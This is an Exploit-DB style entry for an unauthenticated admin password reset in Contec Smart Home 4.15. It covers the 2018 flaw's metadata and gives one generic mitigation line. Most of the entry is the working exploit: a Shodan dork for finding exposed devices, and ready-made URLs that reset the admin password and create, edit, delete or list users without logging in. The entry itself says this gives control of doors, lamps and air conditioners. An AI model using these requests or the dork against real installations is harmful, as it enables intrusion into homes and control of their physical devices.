Contec smart home 4.15 Unauthorized Password Reset

vendor:

Smart Home

by:

Z3ro0ne

7.5

CVSS

HIGH

Unauthorized Password Reset

287

CWE

Product Name: Smart Home

Affected Version From: 4.15

Affected Version To: 4.15

Patch Exists: NO

Related CWE: None

CPE: a:contec:smart_home

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Google Chrome

2018

Contec smart home 4.15 Unauthorized Password Reset

The vulnerability allows an unauthenticated attacker to remotely bypass authentication and change the admin password without the old password and control (lamps, doors, air conditioners, etc.).

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

# Title              : Contec smart home 4.15 Unauthorized Password Reset
# Shodan Dork		 : "content/smarthome.php"
# Vendor Homepage    : http://contec.co.il
# Tested on          : Google Chrome
# Tested version     : 4.15
# Date               : 2018-03-14
# Author             : Z3ro0ne
# Contact            : saadousfar59@gmail.com
# Facebook Page      : https://www.facebook.com/Z3ro0ne
 
# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)


# Exploit 

 To Reset Admin password 
 http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
 
 To Create a new user
 http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
 
  To edit a user
 http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
 
 To Delete a user 
 http://Ipaddress:port/content/delete_user.php?user_name=USER
 
 Users list  
 http://Ipaddress:port/content/user.php